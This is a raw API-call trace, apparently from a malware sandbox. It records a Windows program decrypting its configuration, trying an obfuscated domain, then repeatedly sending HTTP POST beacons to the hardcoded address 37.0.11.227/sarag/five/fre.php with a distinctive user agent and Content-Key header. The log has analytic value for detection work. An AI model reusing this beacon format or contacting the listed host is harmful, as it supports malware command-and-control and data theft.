[0180.728] GetProcessHeap () returned 0x690000 [0180.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xadc) returned 0x2e0 [0180.732] Sleep (dwMilliseconds=0xea60) [0180.733] GetProcessHeap () returned 0x690000 [0180.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0180.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0180.800] GetProcessHeap () returned 0x690000 [0180.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0180.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.802] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0180.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.804] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.805] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.805] GetProcessHeap () returned 0x690000 [0180.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0180.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.807] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0180.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.826] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0180.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.828] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0180.828] GetProcessHeap () returned 0x690000 [0180.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0180.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.830] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.832] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.836] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.840] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.840] GetProcessHeap () returned 0x690000 [0180.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0180.840] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.841] GetProcessHeap () returned 0x690000 [0180.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0180.841] GetProcessHeap () returned 0x690000 [0180.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0180.842] GetProcessHeap () returned 0x690000 [0180.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0180.842] GetProcessHeap () returned 0x690000 [0180.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0180.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.844] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0180.868] GetProcessHeap () returned 0x690000 [0180.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0180.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.870] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.871] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.873] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.873] GetProcessHeap () returned 0x690000 [0180.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0180.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.875] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0180.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.877] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.881] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0180.881] GetProcessHeap () returned 0x690000 [0180.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0180.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.882] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0180.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.929] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0180.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.931] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0180.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.932] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0180.945] GetProcessHeap () returned 0x690000 [0180.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.957] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2c90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0180.957] GetProcessHeap () returned 0x690000 [0180.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0180.957] socket (af=2, type=1, protocol=6) returned 0x2e4 [0180.958] connect (s=0x2e4, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0180.987] FreeAddrInfoW (pAddrInfo=0x6b2c90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0180.987] GetProcessHeap () returned 0x690000 [0180.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0180.988] GetProcessHeap () returned 0x690000 [0180.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0180.989] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.990] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.990] GetProcessHeap () returned 0x690000 [0180.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a9cb8 [0180.990] GetProcessHeap () returned 0x690000 [0180.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0180.991] GetProcessHeap () returned 0x690000 [0180.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0180.991] GetProcessHeap () returned 0x690000 [0180.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0180.992] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.994] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.994] GetProcessHeap () returned 0x690000 [0180.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0180.994] GetProcessHeap () returned 0x690000 [0180.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0180.997] send (s=0x2e4, buf=0x6abd08*, len=242, flags=0) returned 242 [0180.998] send (s=0x2e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0180.998] GetProcessHeap () returned 0x690000 [0180.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0180.998] recv (in: s=0x2e4, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0181.070] GetProcessHeap () returned 0x690000 [0181.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0181.074] GetProcessHeap () returned 0x690000 [0181.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0181.074] GetProcessHeap () returned 0x690000 [0181.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9cb8 | out: hHeap=0x690000) returned 1 [0181.075] GetProcessHeap () returned 0x690000 [0181.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0181.076] closesocket (s=0x2e4) returned 0 [0181.076] GetProcessHeap () returned 0x690000 [0181.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0181.077] GetProcessHeap () returned 0x690000 [0181.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0181.077] GetProcessHeap () returned 0x690000 [0181.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0181.078] GetProcessHeap () returned 0x690000 [0181.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0181.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcbc) returned 0x2e4 [0181.121] Sleep (dwMilliseconds=0xea60) [0181.124] GetProcessHeap () returned 0x690000 [0181.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0181.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.142] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.233] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0181.284] GetProcessHeap () returned 0x690000 [0181.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0181.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.288] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0181.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.297] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.307] GetProcessHeap () returned 0x690000 [0181.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0181.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.309] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0181.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.310] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0181.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.311] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0181.312] GetProcessHeap () returned 0x690000 [0181.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0181.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.316] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.319] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.320] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.321] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.321] GetProcessHeap () returned 0x690000 [0181.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0181.321] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0181.321] GetProcessHeap () returned 0x690000 [0181.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0181.322] GetProcessHeap () returned 0x690000 [0181.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0181.323] GetProcessHeap () returned 0x690000 [0181.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0181.323] GetProcessHeap () returned 0x690000 [0181.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0181.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.324] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0181.348] GetProcessHeap () returned 0x690000 [0181.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0181.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.352] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0181.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.353] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.355] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.355] GetProcessHeap () returned 0x690000 [0181.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0181.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.357] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0181.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.358] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0181.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.359] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0181.359] GetProcessHeap () returned 0x690000 [0181.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0181.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.361] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0181.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.362] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0181.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.363] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0181.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.364] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0181.364] GetProcessHeap () returned 0x690000 [0181.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0181.364] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b29e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0181.364] GetProcessHeap () returned 0x690000 [0181.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0181.364] socket (af=2, type=1, protocol=6) returned 0x2e8 [0181.366] connect (s=0x2e8, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0181.395] FreeAddrInfoW (pAddrInfo=0x6b29e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0181.396] GetProcessHeap () returned 0x690000 [0181.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0181.396] GetProcessHeap () returned 0x690000 [0181.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0181.397] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0181.399] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0181.399] GetProcessHeap () returned 0x690000 [0181.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a9b38 [0181.399] GetProcessHeap () returned 0x690000 [0181.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0181.400] GetProcessHeap () returned 0x690000 [0181.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0181.400] GetProcessHeap () returned 0x690000 [0181.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0181.402] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0181.408] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0181.408] GetProcessHeap () returned 0x690000 [0181.408] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0181.408] GetProcessHeap () returned 0x690000 [0181.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0181.409] send (s=0x2e8, buf=0x6abd08*, len=242, flags=0) returned 242 [0181.410] send (s=0x2e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0181.410] GetProcessHeap () returned 0x690000 [0181.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0181.410] recv (in: s=0x2e8, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0181.495] GetProcessHeap () returned 0x690000 [0181.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0181.497] GetProcessHeap () returned 0x690000 [0181.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0181.498] GetProcessHeap () returned 0x690000 [0181.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9b38 | out: hHeap=0x690000) returned 1 [0181.499] GetProcessHeap () returned 0x690000 [0181.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0181.500] closesocket (s=0x2e8) returned 0 [0181.500] GetProcessHeap () returned 0x690000 [0181.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0181.501] GetProcessHeap () returned 0x690000 [0181.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0181.501] GetProcessHeap () returned 0x690000 [0181.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0181.502] GetProcessHeap () returned 0x690000 [0181.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0181.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcb8) returned 0x2e8 [0181.506] Sleep (dwMilliseconds=0xea60) [0181.515] GetProcessHeap () returned 0x690000 [0181.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0181.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.560] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0181.582] GetProcessHeap () returned 0x690000 [0181.582] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0181.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.590] CryptImportKey 